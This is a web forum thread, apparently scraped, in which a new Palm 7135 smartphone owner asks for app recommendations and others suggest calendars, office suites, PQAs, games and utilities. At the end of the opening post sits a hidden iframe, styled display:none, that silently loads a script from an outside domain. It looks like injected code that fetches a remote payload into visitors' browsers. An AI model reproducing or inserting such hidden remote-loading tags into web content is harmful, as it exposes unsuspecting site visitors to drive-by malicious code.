I need some help properly outfitting my brand new 7135. I was a long time Palm user until the introduction of the Compaq iPaq Pocket PC a couple years ago. I wanted the MP3 support, the bright color screen, and the voice recording, so I got one of the first ones released and have used it and loved it ever since. However, when i got the itch for something new, I stubled upon the 7135 and saw that it had all of that, plus the phone built in, and I was sold.
However, now I feel like a fish out of water. I have been so into the Pocket PC and its applications that I don't know what is going on with the Palm. So I wanted to ask all of you, what do you feel are the essential apps that I need to add to the 7135?
Thanks in advance for your help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Hmm... that's a really detailed question. What do you plan on using your smartphone for? There are some great programs to replace the built-in apps. For example, I use DateBk5, which is absolutely amazing, it replaces the date book and to-do list and adds many new features. I also use TealPhone for my contact information. When I start up my Palm, I use Wassup to display everything that I need to do for the day, similar to the PocketPC Today! feature. I use Documents to Go and QuickOffice for document/speadsheet/presentations, JFile for databases (patient hours, etc), JShopper for shopping lists, PocketQuicken for finances, Solus for GPS, and I have many other programs such as Zagat's, AOL Mail, AvantGo (online and offline web browsing), PhotoSuite for pictures, a TV Guide browser, Eudora mail, ftp, telnet and ssh clients, Parens for advanced calculations, ePocrates Rx for PDR (pharmecuticals database), and a whole bunch of games.

Where did you get the AOL Mail from? Are they charging for the program now????

No, they're not charging for it. I'm an AOL beta tester, so I'm using a never-released version of AOL mail that has TCP/IP and conduit capability (you can downloa your mail at hotsync, or if you have an internet connection on your Palm).
There are non-beta versions also available from AOL or PalmGear that allow you to retrieve your e-mail via web clipping.
ThinkOffice - WP, SS, and DB. Been using ThinkDB for years, and have kept upgrading (now owned by DataViz).
DateBk4/5 (personally 4 does everything I need, and never felt the need to upgrade to 5 ... perhaps the 7135 will inspire me ) - go to www.pimlico.com ... beware of iAmbic. That did some sly things that help people confuse their app with DateBk.
Bejewelled and Zap!2000 are the only games I play regularly.
Useful PQA's - more convenient than full web browsing for many applications.
LATimes PQA (mainly because I wrote it , and it is a useful place to read news)
Tann Traffic PQA
LiveStock (a stock market tracking PQA I wrote that talks to a server I have online occassionaly)
I also recommend DataViz Docs To Go as a replacement sync app.
I've been trying out lots of differert Palm g ames on my 7135. So far here are my top 5 games that I would highly recommend:
GALAG - Excellent translation of the old video game Galaga. A step above most Palm action games!
VEXED - a totally addictive puzzle game. Colorful, challenging, and despite the title, I find it oddly contemplative and relaxing. Its a game you can play discretely and quietly in any situation without looking like a juvenile.
SPACE TRADER - probably the highest rated game on the Palm right now.
MONOPOLY - kind of tiny, but an excellent port with all the gameplay of the board game.
CHESS GENIUS - the full screen mode looks great on the 7135.
I could make 5 more recommendations, but these are the games I play the most. These games are either completely free or if they're demo's, the demos are quite satisfying and repeat playable. You can find them all at download.com.com.
The OAG download page gets an error, and I haven't been able to connect using the OAG pqa app that I already had. Do you know if this program is still available to the public?

Thanks, but DO NOT use this app. ["Battery Log"] It has caused najor problems for people!!!!
I've been using "Launch 'Em" which I am pretty please with and seems very similar to LauncherX. Does anyone know how the two compare and what the most significant differences are?
One program I like that I use every day while staying in Hotels is AirClock 2.40. You can find it at www.airspell.com. It is a great alarm clock with great viewing in dark conditions and it also will turn on a TV at any set time to wake you up.
